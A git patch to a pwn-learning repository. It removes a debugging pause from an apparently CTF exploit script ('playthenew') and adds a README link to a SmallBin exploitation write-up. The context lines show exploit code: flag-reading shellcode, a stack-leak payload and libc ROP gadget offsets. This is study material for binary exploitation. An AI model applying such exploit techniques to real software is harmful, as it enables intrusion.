From 272640d3c66be86442bca092de5e9252cabf4c1a Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Mon, 4 Apr 2022 14:38:35 +0800 Subject: [PATCH] Update OtherBin/playthenew and README --- OtherBin/playthenew/answer.py | 2 -- README.md | 2 ++ 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/OtherBin/playthenew/answer.py b/OtherBin/playthenew/answer.py index cdf40bf..1bb9110 100755 --- a/OtherBin/playthenew/answer.py +++ b/OtherBin/playthenew/answer.py @@ -120,8 +120,6 @@ shellcode = shellcraft.amd64.linux.cat2('flag') secret(p64(0) + p64(gets) + p64(leak_stack - 0x110) + asm(shellcode)) backdoor() -raw_input() - pop_rdi_ret = 0x000000000002164f + libc_base pop_rsi_ret = 0x0000000000023a6a + libc_base pop_rdx_ret = 0x0000000000001b96 + libc_base diff --git a/README.md b/README.md index 0b82e26..b1371b9 100644 --- a/README.md +++ b/README.md @@ -53,3 +53,5 @@ A pwn learning repo containing multiple pwn program codes. [Pwn学习总结(25):_IO_FILE – io_leak](https://renjikai.com/pwn-learning-summary-25/) [Pwn学习总结(26):TCache – tcache231](https://renjikai.com/pwn-learning-summary-26/) + +[Pwn学习总结(27):SmallBin – playthenew](https://renjikai.com/pwn-learning-summary-27/)